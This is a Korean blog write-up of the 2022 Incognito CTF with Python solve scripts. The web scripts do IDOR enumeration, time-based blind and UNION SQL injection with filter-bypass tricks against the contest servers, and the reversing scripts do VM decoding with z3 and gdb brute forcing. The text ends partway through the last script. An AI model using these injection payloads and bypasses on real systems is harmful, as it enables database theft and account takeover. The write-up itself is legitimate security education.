


[2022 Incognito CTF] writeups

deayzl 2023. 3. 27. 20:10

1. crawl

 

import requests

# One Session so the server-side session cookie (which the scraped CSRF
# token is tied to) is shared by every GET/POST pair below.
s = requests.Session()
# Mail id under test; walks upward from 1.  There is no upper bound, so the
# loop only ends when a response contains the flag.  The enumeration works
# because mail ids are plain sequential integers and the endpoint appears to
# return a mail by id alone (inferred from the loop, not verified here); the
# server-side fix is a per-request ownership check on mail_detail.
counter = 1

while True:
    # Reload the mailbox page to scrape a current CSRF token out of its HTML.
    req = requests.Request('GET', 'http://ctf.incognito.kr:9000/ctf/mailbox')
    pre = s.prepare_request(req)
    resp = s.send(pre)
    # Token = text between the literal marker and the next single quote.
    # If the marker is absent, find() returns -1 and the slice silently
    # yields junk instead of failing.
    csrf = resp.text[resp.text.find("{ \"X-CSRFToken\": '")+len("{ \"X-CSRFToken\": '"):]
    csrf = csrf[:csrf.find('\'')]
    
    # POST to mail_detail with a browser-like header set.  The body is the
    # JSON-quoted string "<id>_show"; because it is assigned after
    # prepare_request(), Content-Length has to be set by hand to match.
    req = requests.Request('POST', 'http://ctf.incognito.kr:9000/ctf/mailbox/mail_detail')
    pre = s.prepare_request(req)
    pre.headers['X-CSRFToken'] = csrf
    pre.headers['X-Requested-With'] = 'XMLHttpRequest'
    pre.headers['Referer'] = 'http://ctf.incognito.kr:9000/ctf/mailbox'
    pre.headers['Pragma'] = 'no-cache'
    pre.headers['Origin'] = 'http://ctf.incognito.kr:9000'
    pre.headers['Host'] = 'ctf.incognito.kr:9000'
    pre.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
    pre.headers['Connection'] = 'keep-alive'
    pre.headers['Cache-Control'] = 'no-cache'
    pre.headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'
    pre.headers['Accept-Encoding'] = 'gzip, deflate'
    pre.headers['Accept-Language'] = 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7'
    pre.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'
    pre.headers['Content-Length'] = str(len(f'"{counter}_show"'))
    pre.body = f'"{counter}_show"'
    resp = s.send(pre)
    print(resp.text)
    # len-1-2 is the third character from the end of the body; presumably
    # the flag's closing brace sits there inside the JSON wrapper -- not
    # verified here.
    if 'INCO{' in resp.text and resp.text[len(resp.text)-1-2] == '}':
        print('got it!!')
        break
    counter += 1
#INCO{It_1s_F1Ag_tHank_yOu3}

 

2. login

 

web 문제 중 blacklist filter 가 있는 경우, 대문자를 끼워넣거나 %0a 를 사용하는 방식으로 우회할 수 있다.

그리고 table, column 의 이름은 information_schema, sqlite 의 경우 sqlite_master 에서 알 수 있다.

import requests
import time

#table: member ADMINISTRABLE_ROLE_AUTHO)IZATIO7S INNODB_TABLESPACES

#member
#column: name pw num

# Time-based blind extraction of member.pw.  Every request embeds a
# conditional sleep(3); a round trip longer than 2 s is read as "true".
# The threshold leaves only 1 s of slack, so a slow hop can produce a false
# positive -- nothing below retries or re-confirms a hit.

# Phase 1: find len(pw).  "length < counter" first becomes true at
# counter == len + 1, hence the counter -= 1 on the hit.
counter = 0
while True:
    start_time = time.time()
    req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aLeNgth(pw)<{counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
    end_time = time.time()
    #print(end_time - start_time)
    if end_time - start_time > 2:
        counter -= 1
        break
    counter += 1
_len = counter
print(_len)

# Phase 2: recover each character by a linear walk over ASCII codes starting
# at 33 ('!').  The inner loop has no upper bound: if no code ever triggers
# the delay (a character below 33, or a missed timing hit) it never ends.
_name = ''
for i in range(_len):
    counter = 33
    while True:
        start_time = time.time()
        req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aaScii(suBsTring(pw,{i+1},1))={counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
        end_time = time.time()
        #print(end_time - start_time)
        if end_time - start_time > 2:
            #counter -= 1
            _name += chr(counter)
            print('Hit!, ', _name)
            break
        counter += 1
print(_name)
#VAPB{U3110!o1vaq_4qz1a!!} -> rot13 13 ->
#INCO{H3110!b1ind_4dm1n!!}

3. admin

 

여기는 select 의 사용이 불가능하기에 column 의 이름을 추측해야 하고,

time based sql injection 으로 YWRtaW5z (admins) 계정의 학번을 알아내야 한다.

그 계정으로 "비밀번호 찾기" 를 누르면, flag 의 base64 값이 나온다.

import requests
import time
import string

# Time-based blind extraction of the `num` column for the row whose name is
# 'YWRtaW5z'.  Digits are appended one at a time: the LIKE pattern sent is
# '<known prefix><candidate digit>%' (the trailing %25 is a literal '%'),
# and a response slower than 2 s means the candidate is right.  The outer
# loop ends on the first position where no digit triggers the delay, so the
# value is assumed to consist of digits only.
num = ''
counter = 1   # round counter; incremented but never read
while True:
    bFound = False
    for i in string.digits:
        start_time = time.time()
        req = requests.get(f'http://ctf.incognito.kr:48888/index.php?name=asdf%5C&num=%0aor%0aif(name%0alike%0a\'YWRtaW5z\'%0aand%0anum%0alike%0a\''+num+i+'%25\',sleep(3),False)%0aor%0a%27')
        end_time = time.time()
        print(end_time - start_time)
        # 2 s threshold against a 3 s sleep: a single slow round trip is
        # enough to append a wrong digit, and there is no re-check.
        if end_time - start_time > 2:
            num += i
            print('Hit!, ', num)
            bFound = True
            break
    if not bFound:
        break
    counter += 1
print(num)
#YWRtaW5z 19383746 -> SU5DT3tCNDUzNjRfMTVfNW9fMzQ1eSEhIX0= -> INCO{B45364_15_5o_345y!!!}

4. chatting

 

여러 테이블 중 auth_user 의 first_name 을 보면 flag 를 얻을 수 있다.

CREATE TABLE "django_migrations" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "app" varchar(255) NOT NULL, "name" varchar(255) NOT NULL, "applied" datetime NOT NULL)

CREATE TABLE sqlite_sequence(name,seq)

CREATE TABLE "auth_group_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)

CREATE TABLE "auth_user_groups" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED)

CREATE TABLE "auth_user_user_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)

CREATE UNIQUE INDEX "auth_group_permissions_group_id_permission_id_0cd325b0_uniq" ON "auth_group_permissions" ("group_id", "permission_id")

CREATE INDEX "auth_group_permissions_group_id_b120cbf9" ON "auth_group_permissions" ("group_id")

CREATE INDEX "auth_group_permissions_permission_id_84c5c92e" ON "auth_group_permissions" ("permission_id")

CREATE UNIQUE INDEX "auth_user_groups_user_id_group_id_94350c0c_uniq" ON "auth_user_groups" ("user_id", "group_id")

CREATE INDEX "auth_user_groups_user_id_6a12ed8b" ON "auth_user_groups" ("user_id")

CREATE INDEX "auth_user_groups_group_id_97559544" ON "auth_user_groups" ("group_id")

CREATE TABLE "django_admin_log" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "object_id" text NULL, "object_repr" varchar(200) NOT NULL, "action_flag" smallint unsigned NOT NULL CHECK ("action_flag" >= 0), "change_message" text NOT NULL, "content_type_id" integer NULL REFERENCES "django_content_type" ("id") DEFERRABLE INITIALLY DEFERRED, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "action_time" datetime NOT NULL)

...
import requests


# Single UNION-based query: the response is expected to echo first_name from
# auth_user, and the flag is cut out between 'INCO{' and the next '}'.
# If 'INCO{' is absent, find() returns -1, the first slice keeps only the
# last character, and the result degrades to an empty or one-character
# string instead of failing loudly.
req = requests.get(f'http://ctf.incognito.kr:8877/?search=%27%20union%20select%20first_name,%20first_name%20from%20auth_user--%20')
flag = req.text[req.text.find('INCO{'):]
flag = flag[:flag.find('}')+1]
print(flag)
#INCO{5ql_1NjEc71on}

5. DoNotDebug

 

IsDebuggerPresent 와 같은 안티 디버깅 기법들을 제거하는 패치를 해주면 손쉽게 flag 를 얻을 수 있다.

6. Stack Machine

 

vm 파일의 instruction 을 해석하고 난 후, z3 로 풀면 끝.

from pwn import *

# Read the whole 'vm' image; the first two bytes are a u16 length prefix and
# the bytecode that follows it is what gets decoded.
with open('vm', 'rb') as f:
    vm_raw = f.read()

vm_len = u16(vm_raw[:2])
vm = vm_raw[2:vm_len + 2]

# Placeholder stack; never touched here, the listing only names slots.
c = [0] * 700

# Opcodes that fold the top two stack slots into the lower one.  The
# template text is exactly what the listing prints for each of them.
FOLD_OPS = {
    202: 'c[{lo}] ^= c[{hi}]',
    184: 'c[{lo}] += c[{hi}]',
    48: 'c[{lo}] = (c[{hi}] != c[{lo}])',
}

# sp mirrors the VM's stack top so every printed line names a real slot;
# it starts at -1 (empty stack) and the listing states that up front.
print('j == -1')
sp = -1
pc = 0
while pc < vm_len:
    op = vm[pc]
    pc += 1
    if op in FOLD_OPS:
        print(FOLD_OPS[op].format(lo=sp - 1, hi=sp))
        sp -= 1
    elif op == 219:
        # getchar: push one input byte
        sp += 1
        print(f'c[{sp}] = getchar()')
    elif op == 41:
        # push a 64-bit immediate that follows the opcode
        sp += 1
        print(f'c[{sp}] = {u64(vm[pc:pc+8])}')
        pc += 8
    elif op == 213:
        # conditional jump; pops the tested slot.
        # NOTE(review): the operand is printed only after pc has already
        # been advanced past it, unlike opcodes 41 and 161, so the value
        # shown is the next 8 bytes of the stream rather than the jump
        # operand itself.  The transcript below did not depend on the jump
        # target, but check the VM format before trusting this line.
        pc += 8
        print(f'c[{sp}] != 0 then i += 8+{u64(vm[pc:pc+8])}')
        sp -= 1
    elif op == 54:
        # putchar: pop and print
        print(f'putchar(c[{sp}])')
        sp -= 1
    elif op == 161:
        # exit: the decoder stops here too, so nothing after this opcode
        # in the image is listed.
        print(f'exit({u64(vm[pc:pc+8])})')
        exit()
    else:
        assert False
from z3 import *

# One symbolic 8-bit variable per getchar() call, in call order.
inp = []

# Symbolic copy of the VM stack; the transcript below indexes up to c[54].
c = [0] * 100

s = Solver()

def getchar():
    """Stand-in for the VM's getchar: return a fresh 8-bit symbol, recorded in `inp`."""
    sym = BitVec('inp[%d]' % len(inp), 8)
    inp.append(sym)
    return sym

# Straight-line transcript of the VM program as printed by the decoder above:
# '=' lines are constant pushes, getchar() pushes one fresh symbolic input
# byte, and each '^=' / '+=' line folds the top two slots into the lower one.
# Every round leaves its result in the lowest slot it touched (c[0] for the
# first round, c[1] for the second, ...); those 46 slots are constrained
# against `res` further down.
# NOTE(review): the constants are 64-bit values while getchar() returns an
# 8-bit BitVec; how z3 widens or truncates the mixed-width operands is not
# visible here.  The run evidently recovered the flag, but confirm the
# coercion width before reusing this pattern elsewhere.
# --- round 0 -> c[0], input byte 0 ---
c[0] = 9932684790403988281
c[1] = 3981783414261391299
c[2] = 18128899290963801448
c[3] = 7499717806347970135
c[4] = 5425025371572045960
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] += c[2]
c[0] ^= c[1]
# --- round 1 -> c[1], input byte 1 ---
c[1] = 6326606491199503735
c[2] = 11727609654421141602
c[3] = 13333360695465845293
c[4] = 15936386119677961440
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] ^= c[2]
# --- round 2 -> c[2], input byte 2 ---
c[2] = 13013207156595470061
c[3] = 1444156656146803533
c[4] = 6835624496029438678
c[5] = getchar()
c[4] ^= c[5]
c[3] += c[4]
c[2] ^= c[3]
# --- round 3 -> c[3], input byte 3 ---
c[3] = 9473197671008895425
c[4] = 16390026795440292412
c[5] = 8618855848416941065
c[6] = getchar()
c[5] += c[6]
c[4] ^= c[5]
c[3] += c[4]
# --- round 4 -> c[4], input byte 4 ---
c[4] = 6024961974338290886
c[5] = 8810359034158194075
c[6] = 14469683107865870911
c[7] = 16039933917641716108
c[8] = 12640120913447022199
c[9] = getchar()
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] ^= c[6]
c[4] += c[5]
# --- round 5 -> c[5], input byte 5 ---
c[5] = 5193290494856744947
c[6] = 10690958200367824705
c[7] = 4868948814662615861
c[8] = 683964415960939350
c[9] = 4163681683479634048
c[10] = 12168753866435275347
c[11] = 12146127191315940638
c[12] = getchar()
c[11] ^= c[12]
c[10] += c[11]
c[9] ^= c[10]
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] += c[6]
# --- round 6 -> c[6], input byte 6 ---
c[6] = 3476564392780481757
c[7] = 2006874671871151415
c[8] = 12824197427929327444
c[9] = 12083025626049681937
c[10] = 16008583071417006553
c[11] = 3503452712029565141
c[12] = 4687048395109227849
c[13] = 16854047988139109216
c[14] = 13756878276426990950
c[15] = getchar()
c[14] ^= c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] ^= c[12]
c[10] += c[11]
c[9] += c[10]
c[8] ^= c[9]
c[7] ^= c[8]
c[6] += c[7]
# --- round 7 -> c[7], input byte 7 ---
c[7] = 7028037281966016268
c[8] = 14165122113651211877
c[9] = 5392392772250547940
c[10] = 3311842680646068432
c[11] = getchar()
c[10] ^= c[11]
c[9] += c[10]
c[8] += c[9]
c[7] += c[8]
# --- round 8 -> c[8], input byte 8 ---
c[8] = 9258641333616248163
c[9] = 13646422201855178699
c[10] = 17244770065079177130
c[11] = getchar()
c[10] += c[11]
c[9] += c[10]
c[8] += c[9]
# --- round 9 -> c[9], input byte 9 ---
c[9] = 11263758573414315722
c[10] = 2291098985055159465
c[11] = 17736300515739104956
c[12] = 9225658490194612832
c[13] = getchar()
c[12] += c[13]
c[11] += c[12]
c[10] += c[11]
c[9] ^= c[10]
# --- round 10 -> c[10], input byte 10 ---
c[10] = 10725323274089116828
c[11] = 6647285194965883625
c[12] = 10033362048030486878
c[13] = 8536304132617548188
c[14] = 6486727104292397225
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] += c[13]
c[11] += c[12]
c[10] ^= c[11]
# --- round 11 -> c[11], input byte 11 ---
c[11] = 10031450704042083898
c[12] = 15064108163919261094
c[13] = 6566164850047027542
c[14] = 3579091316087062654
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] += c[12]
# --- round 12 -> c[12], input byte 12 ---
c[12] = 698354924443006014
c[13] = 15280877972506416330
c[14] = 15577458196294027228
c[15] = getchar()
c[14] += c[15]
c[13] += c[14]
c[12] += c[13]
# --- round 13 -> c[13], input byte 13 ---
c[13] = 2498670747640652309
c[14] = 9524402598716321551
c[15] = 18044044835724495664
c[16] = 6213568967391424121
c[17] = 3147938522393136546
c[18] = 1730165799852629577
c[19] = 6408097110053457446
c[20] = 6196815601815273338
c[21] = 270944429482767874
c[22] = getchar()
c[21] += c[22]
c[20] += c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[13] += c[14]
# --- round 14 -> c[14], input byte 14 ---
c[14] = 4918898107041287428
c[15] = 18175739274470711949
c[16] = 14421442322560697809
c[17] = getchar()
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
# --- round 15 -> c[15], input byte 15 ---
c[15] = 8018804925798494415
c[16] = 6710318530716452507
c[17] = 16126219073666357108
c[18] = 14081309027816664652
c[19] = 16733055164831549011
c[20] = 7157954037798845337
c[21] = getchar()
c[20] += c[21]
c[19] ^= c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
# --- round 16 -> c[16], input byte 16 ---
c[16] = 15503965566483097647
c[17] = 4996101922589672156
c[18] = 5833521358458912777
c[19] = 2723680459370559844
c[20] = 2328313581554868504
c[21] = 1357365813224912539
c[22] = 14696593702283082662
c[23] = getchar()
c[22] += c[23]
c[21] ^= c[22]
c[20] ^= c[21]
c[19] += c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
# --- round 17 -> c[17], input byte 17 ---
c[17] = 13718262097243472683
c[18] = 3323983633866858589
c[19] = 10119337698916987669
c[20] = 1136020430667426008
c[21] = getchar()
c[20] ^= c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] ^= c[18]
# --- round 18 -> c[18], input byte 18 ---
c[18] = 4498241019005291386
c[19] = 10430024839406056567
c[20] = 11081984034916842939
c[21] = 2377861015981010747
c[22] = 8140368618305448802
c[23] = 11818413254717561094
c[24] = 7064401558039292889
c[25] = 12505631402569488455
c[26] = getchar()
c[25] += c[26]
c[24] += c[25]
c[23] += c[24]
c[22] += c[23]
c[21] += c[22]
c[20] += c[21]
c[19] += c[20]
c[18] ^= c[19]
# --- round 19 -> c[19], input byte 19 ---
c[19] = 12426720606117189214
c[20] = 14972901593259487129
c[21] = 8543482851339982473
c[22] = getchar()
c[21] += c[22]
c[20] ^= c[21]
c[19] += c[20]
# --- round 20 -> c[20], input byte 20 ---
c[20] = 1629889153707539478
c[21] = 17341177077300957439
c[22] = 6078944653200992161
c[23] = 10566666523869213247
c[24] = 7263284840378083349
c[25] = 17584022320925044751
c[26] = 8692105150239555357
c[27] = 315833979318776616
c[28] = 6269493266600410358
c[29] = getchar()
c[28] ^= c[29]
c[27] ^= c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] += c[23]
c[21] ^= c[22]
c[20] += c[21]
# --- round 21 -> c[21], input byte 21 ---
c[21] = 1928151548783765996
c[22] = 9136913200161131206
c[23] = 9558448254955062399
c[24] = 9043200431716271294
c[25] = 7522359116772730195
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] ^= c[23]
c[21] += c[22]
# --- round 22 -> c[22], input byte 22 ---
c[22] = 9912258405660383033
c[23] = 6050409919930564764
c[24] = 772317344628148685
c[25] = 11746303378648469064
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[22] ^= c[23]
# --- round 23 -> c[23], input byte 23 ---
c[23] = 18139491710616570868
c[24] = 9346305025277215902
c[25] = 835069692985696380
c[26] = 1773732121093517278
c[27] = 105682633695814624
c[28] = 8210763851348992640
c[29] = 1113714189784085863
c[30] = 5476748382071574810
c[31] = getchar()
c[30] ^= c[31]
c[29] ^= c[30]
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
# --- round 24 -> c[24], input byte 24 ---
c[24] = 4433023941960474278
c[25] = 14112970271161702627
c[26] = 14453461473651973526
c[27] = 11710389551995994491
c[28] = getchar()
c[27] ^= c[28]
c[26] ^= c[27]
c[25] += c[26]
c[24] += c[25]
# --- round 25 -> c[25], input byte 25 ---
c[25] = 10631904080342836610
c[26] = 13189193739346557134
c[27] = 8869784457484967284
c[28] = 12194173170689449781
c[29] = getchar()
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] += c[26]
# --- round 26 -> c[26], input byte 26 ---
c[26] = 15915053349214019189
c[27] = 11521767751078383438
c[28] = 14533552431219244418
c[29] = 14300881089460759252
c[30] = 9040285580144197694
c[31] = 10257692247147470437
c[32] = 14192837257263753759
c[33] = 2735605769679131093
c[34] = getchar()
c[33] += c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[27] ^= c[28]
c[26] ^= c[27]
# --- round 27 -> c[27], input byte 27 ---
c[27] = 13646125251590784611
c[28] = 2350223036634077455
c[29] = 5333532857677095192
c[30] = getchar()
c[29] ^= c[30]
c[28] += c[29]
c[27] ^= c[28]
# --- round 28 -> c[28], input byte 28 ---
c[28] = 10718192012270129589
c[29] = 123785428779133261
c[30] = 1115427221566365663
c[31] = 13858125889399502454
c[32] = 15421756623045370081
c[33] = 10625431853482940446
c[34] = 2858922243027052087
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
# --- round 29 -> c[29], input byte 29 ---
c[29] = 4193907992175213577
c[30] = 170664819355138875
c[31] = 9846060713415560061
c[32] = 10008376725607836570
c[33] = 6500742485917708152
c[34] = 3703571390196563300
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[30] ^= c[31]
c[29] ^= c[30]
# --- round 30 -> c[30], input byte 30 ---
c[30] = 16068289189730100280
c[31] = 15983412130463586929
c[32] = 6101489928213793106
c[33] = 15632864178300331681
c[34] = 13550763660520404178
c[35] = 1631272113114106589
c[36] = 3288050860235592420
c[37] = 1790832365339697305
c[38] = 4237654194595834826
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] += c[34]
c[32] += c[33]
c[31] += c[32]
c[30] += c[31]
# --- round 31 -> c[31], input byte 31 ---
c[31] = 1399164207473144990
c[32] = 15677047834318502945
c[33] = 7507893918949420867
c[34] = 14174128410387719963
c[35] = 11736459515879490328
c[36] = 11055886264332921041
c[37] = 9004881701944248172
c[38] = 17459828991442561468
c[39] = 12657901952147185249
c[40] = getchar()
c[39] ^= c[40]
c[38] += c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
# --- round 32 -> c[32], input byte 32 ---
c[32] = 11542163322951764181
c[33] = 13556695670265251290
c[34] = 8896178454740675680
c[35] = 9714994894358830132
c[36] = 4415780584005132632
c[37] = 12574376580664805321
c[38] = 2705749237807390307
c[39] = getchar()
c[38] ^= c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] += c[33]
# --- round 33 -> c[33], input byte 33 ---
c[33] = 2062725140253809310
c[34] = 1545706997601201613
c[35] = 16466472025074215596
c[36] = 13910973756042749477
c[37] = getchar()
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] += c[34]
# --- round 34 -> c[34], input byte 34 ---
c[34] = 15313922134322430163
c[35] = 5554890310739120801
c[36] = 10023476581573828743
c[37] = 9119145857545001130
c[38] = 4054077477321909583
c[39] = 12407098630961990094
c[40] = getchar()
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] ^= c[35]
# --- round 35 -> c[35], input byte 35 ---
c[35] = 1350795824549080488
c[36] = 6009822791611617285
c[37] = 8119372895504244127
c[38] = 2251446627786121745
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] ^= c[37]
c[35] ^= c[36]
# --- round 36 -> c[36], input byte 36 ---
c[36] = 15362678556740064341
c[37] = 10316159694986214414
c[38] = 3591983768360169475
c[39] = 14938784382612384621
c[40] = 11339084893309025514
c[41] = 12205994744993947123
c[42] = 17433327879405071452
c[43] = 5816977475588028627
c[44] = 16136773507488350822
c[45] = getchar()
c[44] += c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
# --- round 37 -> c[37], input byte 37 ---
c[37] = 14016925425405076414
c[38] = 6267620817628946003
c[39] = 16430625412469031478
c[40] = 88182008894387362
c[41] = 8709429871187949033
c[42] = 10589748356343871522
c[43] = 5064334248483087925
c[44] = 7426804913387014566
c[45] = 10865171643927062589
c[46] = getchar()
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] ^= c[38]
# --- round 38 -> c[38], input byte 38 ---
c[38] = 16763221103862173059
c[39] = 13422886181026844195
c[40] = 1631568059986288660
c[41] = 5215276383434159904
c[42] = 599997451257354427
c[43] = 16090446934827825033
c[44] = 5698261134564167716
c[45] = 14703224673005718394
c[46] = 16483544490155560671
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] ^= c[39]
# --- round 39 -> c[39], input byte 39 ---
c[39] = 5514693649090898598
c[40] = 5675775170157984441
c[41] = 14125598251763666359
c[42] = 18170077620203995512
c[43] = 19592580633248516
c[44] = 13683458113123837196
c[45] = getchar()
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] ^= c[40]
# --- round 40 -> c[40], input byte 40 ---
c[40] = 3131572931438933272
c[41] = 10714943557282477766
c[42] = 5484270251250118157
c[43] = 7822281286051639469
c[44] = 217496263967125951
c[45] = 7383182598747815858
c[46] = getchar()
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] ^= c[43]
c[41] += c[42]
c[40] += c[41]
# --- round 41 -> c[41], input byte 41 ---
c[41] = 11073291388929666744
c[42] = 12556045251181411187
c[43] = 17202987169272959651
c[44] = 3498233194846432736
c[45] = 9811028171250343540
c[46] = 15447895449397085620
c[47] = getchar()
c[46] ^= c[47]
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] += c[42]
# --- round 42 -> c[42], input byte 42 ---
c[42] = 18311754622359156630
c[43] = 15594695003269406222
c[44] = 14863770709621722151
c[45] = 1995415076881473459
c[46] = 11624903732590886947
c[47] = getchar()
c[46] += c[47]
c[45] += c[46]
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
# --- round 43 -> c[43], input byte 43 ---
c[43] = 11997434615315793955
c[44] = 15206057853866387321
c[45] = 11758249108697471326
c[46] = 5159877175902714817
c[47] = 11990864672144733375
c[48] = 16654263466120501907
c[49] = getchar()
c[48] += c[49]
c[47] += c[48]
c[46] ^= c[47]
c[45] ^= c[46]
c[44] += c[45]
c[43] ^= c[44]
# --- round 44 -> c[44], input byte 44 ---
c[44] = 14901411196071314281
c[45] = 16947858051347698953
c[46] = 11966293193572801808
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] += c[45]
# --- round 45 -> c[45], input byte 45 ---
c[45] = 17205182659947320959
c[46] = 7134039153444132965
c[47] = 1106747787369745867
c[48] = 8187918296814335425
c[49] = 15956329184180189402
c[50] = 4384353541114149762
c[51] = 2675631644319678684
c[52] = 2847463810049019273
c[53] = 12182251566179445109
c[54] = getchar()
c[53] += c[54]
c[52] += c[53]
c[51] ^= c[52]
c[50] ^= c[51]
c[49] += c[50]
c[48] += c[49]
c[47] ^= c[48]
c[46] ^= c[47]
c[45] ^= c[46]

j = 0
# Expected final stack contents, top slot first: res[0] pairs with c[45],
# res[45] with c[0].
res = [
    11160101089126054161, 2012728469017988072, 11117105121394465975,
    12198350148471122344, 7607965874239596224, 6793088470981622980,
    9191418319461399064, 15232517486787036234, 5261740622873570926,
    2111042004194075722, 14858885011757777482, 17272697075264961523,
    6313158162450257254, 1588658321132036046, 8991448573755356202,
    4497652325675240907, 6016728178720961850, 13453796986756982161,
    15547245991394917615, 5920391660159577516, 7991567300444707631,
    7743736540782924899, 4781932715221502857, 9817029683742592938,
    4201915802787942712, 12177332710199634000, 7336213525980958596,
    5652188919652622626, 1130153536024248183, 4759154887302418413,
    16866370082191875729, 622591556653593921, 12982067723104642403,
    13109947019533898011, 5112040232137058942, 9739034644397517078,
    695619218990020835, 3256345453131500815, 11450650774804292870,
    3932877630134846168, 9357541319859029781, 9237722673203544338,
    1756632871624628261, 14303295942802133775, 10460946694704824854,
    11086382675458244744,
]

# Pin each result slot to its expected value, walking the stack top-down.
for slot, expected in zip(range(45, -1, -1), res):
    s.add(c[slot] == expected)

print(s.check())
md = s.model()
print(md)
# Emit the recovered input bytes in the order getchar() produced them.
print(''.join(chr(md[sym].as_long()) for sym in inp), end='')
#INCO{94a7d6671aab2c62db0760e639c5217781030e2f}

7. NAND

 

import gdb

# idx: flag position currently being brute-forced.
# bf_idx: index into charset_range of the candidate being tried there.
idx = 0
bf_idx = 0

# Candidate alphabet, taken verbatim from a gdb memory dump of the binary's
# charset table; address tokens are dropped, byte values kept in dump order.
charset_dump = '''0x555555401e20: 0x37    0x6e    0x6b    0x75    0x34    0x67    0x30    0x73
0x555555401e28: 0x62    0x39    0x31    0x6c    0x6f    0x38    0x5f    0x63
0x555555401e30: 0x76    0x69    0x6d    0x79    0x33    0x78    0x65    0x70
0x555555401e38: 0x72    0x68    0x66    0x36    0x7a    0x74    0x35    0x61
0x555555401e40: 0x64    0x32    0x77    0x71 0x6a'''
charset_range = [int(tok, 16) for tok in charset_dump.split() if '0x5555' not in tok]

# 40 flag bytes seeded with the first candidate, plus a NUL terminator.
flag = [charset_range[0]] * 40 + [0]

gdb.execute('file NAND')
gdb.execute('aslr off')

# One "wrong character" address (RVA) per flag position: stopping at
# hell_list[k] means position k was rejected.  Rebased to the no-ASLR load
# address and given a breakpoint each.
